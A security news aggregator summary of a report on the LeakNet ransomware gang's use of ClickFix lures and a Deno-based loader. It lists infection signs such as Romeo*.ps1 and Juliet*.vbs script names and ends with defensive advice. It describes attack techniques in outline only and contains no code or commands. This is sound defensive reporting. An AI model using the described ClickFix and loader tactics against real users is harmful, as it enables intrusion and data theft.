CP
cyberpings
Malware & RansomwareHIGH

LeakNet Ransomware - Stealthy Attacks Using ClickFix Technique

BCBleepingComputer
LeakNetClickFixDenoransomwaremalware loader
🎯

Basically, a new ransomware gang is using clever tricks to sneak into companies and steal data.

Quick Summary

LeakNet ransomware gang is using ClickFix for stealthy attacks. This new tactic targets corporate environments, increasing the risk of data breaches. Organizations must stay vigilant.

What Happened

The LeakNet ransomware gang has recently ramped up its operations by adopting a new technique called ClickFix. This method allows attackers to gain initial access to corporate environments by tricking users into executing malicious commands. Once inside, they deploy a malware loader that utilizes the open-source Deno runtime for JavaScript and TypeScript. This approach minimizes the risk of detection, making it a formidable tactic in the ransomware landscape.

LeakNet, which has been active since late 2024, typically targets around three victims each month. However, with the introduction of ClickFix and Deno, their operational capacity may increase significantly. The use of legitimate tools like Deno helps them bypass security measures, making it harder for organizations to spot the intrusion.

Who's Being Targeted

LeakNet primarily targets corporate environments, where the potential for data theft and disruption is high. The ClickFix technique is particularly effective in environments where employees may be less vigilant about executing commands from seemingly legitimate prompts. As more organizations rely on JavaScript and TypeScript for their operations, the risk of falling victim to these attacks grows.

The gang's tactics, which include using Visual Basic Script (VBS) and PowerShell scripts, are designed to blend in with normal developer activities. This stealthy approach allows them to execute their payloads without raising alarms, further increasing the likelihood of successful breaches.

Signs of Infection

Organizations should be on the lookout for several signs that may indicate LeakNet activity. Key indicators include:

  • Deno running outside of development environments: If Deno is observed executing outside its intended use, it could signal a compromise.
  • Suspicious execution patterns: Unusual execution of scripts, particularly those named like Romeo*.ps1 and Juliet*.vbs, can indicate malicious activity.
  • Unexpected outbound traffic: Any abnormal connections to Amazon S3 buckets or other unusual destinations should be investigated promptly.

By understanding these signs, security teams can better prepare and respond to potential threats from LeakNet.

How to Protect Yourself

To defend against LeakNet and similar ransomware threats, organizations should implement several proactive measures:

  • Enhance user training: Educate employees about social engineering tactics, including ClickFix, to reduce the likelihood of falling victim to these scams.
  • Monitor for unusual activities: Regularly check for unexpected Deno executions and other suspicious behaviors within your network.
  • Strengthen endpoint security: Utilize advanced endpoint detection and response (EDR) solutions that can identify and respond to anomalies in real-time.

By taking these steps, organizations can significantly reduce their risk of ransomware attacks and better protect their sensitive data from groups like LeakNet.

🔒 Pro insight: The adoption of Deno in ransomware operations signifies a shift towards leveraging legitimate tools for malicious purposes, complicating detection efforts.

Original article from

BleepingComputer · Bill Toulas

Read Full Article

Share

Related Pings

HIGHMalware & Ransomware

Malware - Konni Uses Phishing to Deploy EndRAT via KakaoTalk

North Korean hackers are using phishing emails to deploy EndRAT malware. Victims' KakaoTalk accounts are compromised to spread the attack further. This poses a significant risk to sensitive information and trust among contacts. Stay vigilant against suspicious emails and messages.

The Hacker News·
HIGHMalware & Ransomware

Payload Ransomware - New Threat Uses Babuk-Style Encryption

A new ransomware called Payload is wreaking havoc across sectors. It targets mid-to-large organizations, stealing and encrypting critical data. With advanced techniques, the risk of data loss is significant. Organizations must take immediate action to protect themselves.

Cyber Security News·
HIGHMalware & Ransomware

Malware - ClickFix Attacks Evolve with ChatGPT Lures

ClickFix attacks are evolving, now targeting macOS users with sophisticated infostealers like MacSync. These tactics exploit user trust, bypassing security measures. Stay alert to protect your data!

Security Affairs·
HIGHMalware & Ransomware

Malware - Malicious npm Packages Deliver PylangGhost RAT

A new remote access trojan, PylangGhost, has infiltrated npm packages, posing a serious risk to developers. This malware, linked to North Korean hackers, could compromise entire organizations. Immediate action is essential to mitigate the threat.

Cyber Security News·
HIGHMalware & Ransomware

Malware - New CondiBot Variant and Monaco Cryptominer Threaten

New malware strains, CondiBot and Monaco, are targeting network devices, posing significant risks to enterprises. Their multi-architecture designs allow for widespread exploitation. Organizations must act swiftly to protect their infrastructure.

Cyber Security News·
HIGHMalware & Ransomware

Keylogger - Understanding This Old-School Malware Threat

Keyloggers are still a serious threat in cybercrime today. They capture sensitive data like passwords and financial information. Understanding how they work can help you protect yourself.

CSO Online·